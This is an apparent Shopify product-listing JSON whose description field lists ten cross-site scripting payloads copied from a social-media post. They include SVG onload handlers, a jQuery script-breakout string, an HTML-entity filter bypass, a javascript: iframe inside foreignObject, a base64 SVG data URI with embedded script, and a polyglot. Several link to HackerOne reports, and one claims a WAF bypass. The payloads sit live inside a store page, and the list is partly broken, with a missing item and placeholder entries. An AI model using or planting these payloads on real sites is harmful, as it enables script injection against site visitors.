{"product_id":"xss-svg-xml","title":"xss svg + xml UTAMA","description":"\u003cp\u003eVAIDIK PANDYA @h4x0r_fr34k 10 XSS payloads that you can use ! 1. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E,\u003c\/p\u003e\n\u003csvg onload='alert(\"XSS\")'\u003e \nhttps:\/\/hackerone.com\/reports\/2433634\n\n2. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e\nhttps:\/\/hackerone.com\/reports\/846338\nThe payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag\n\n3.  \nhttps:\/\/x.com\/botami143\/stat\/Botami143\/status\/1618005491124404224\nWAF \/ Cloudflare Bypass\n\n4. ”\/\u0026gt;\u0026amp;_lt;_script\u0026gt;alert(1)\u0026amp;_lt;\/scr_ipt\u0026gt;”\/\u0026gt; remove the underscores\nhttps:\/\/hackerone.com\/reports\/484434\nfiltering using HTML entities for the alternation of \u0026lt;\u0026gt;, because I noticed that it's filtering the\n\n5. XYZ\nhttps:\/\/pravinponnusamy.medium.com\/xss-payloads-7079c53c8559\n\n6. \u003cscript\u003e\u003c\/script\u003e\/***\/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')\/***\/OnMouseOver {Firefox \u0026amp; Opera}\n\n8. \u003csvg\u003e \u003cforeignobject width=\"100%\" height=\"100%\"\u003e      \u003ciframe src=\"javascript:confirm(10)\"\u003e\u003c\/iframe\u003e        \u003c\/foreignobject\u003e \u003c\/svg\u003e\nhttps:\/\/x.com\/xsspayloads\/st\/XssPayloads\/status\/1773945831952900587\n\n9. \u003cscript\u003evar a=document.createElement(\"a\");a.href=\"data:text\/html;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI\/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cG9seWdvbiBpZD0idHJpYW5nbGUiIHBvaW50cz0iMCwwIDAsNTAgNTAsMCIgZmlsbD0iIzAwOTkwMCIgc3Ryb2tlPSIjMDA0NDAwIi8+CiAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KICAgICAgYWxlcnQoJ3hzcycpOwogICA8L3NjcmlwdD4KPC9zdmc+\";http:\/\/a.click();\u003c\/script\u003e\nhttps:\/\/0xkayala.medium.com\/30-encoded-xss-payloads-generated-by-chatgpt-dc0d9ac1c1cc\nEncoded by chatGPT\n\n10. jaVasCript:\/*--\u0026gt;\u003csvg onload='+\/\"\/+\/onmouseover=1\/+\/[*\/[]\/+alert(1)\/\/'\u003e\n\"'alert(1)\u003c\/svg\u003e\u003c\/svg\u003e","brand":"money","offers":[{"title":"Default Title","offer_id":44210815762597,"sku":"","price":0.0,"currency_code":"IDR","in_stock":false}],"thumbnail_url":"\/\/cdn.shopify.com\/s\/files\/1\/0401\/5210\/5125\/files\/evilsvg_3.svg?v=1726850401","url":"https:\/\/mesoancassie.myshopify.com\/products\/xss-svg-xml","provider":"money","version":"1.0","type":"link"}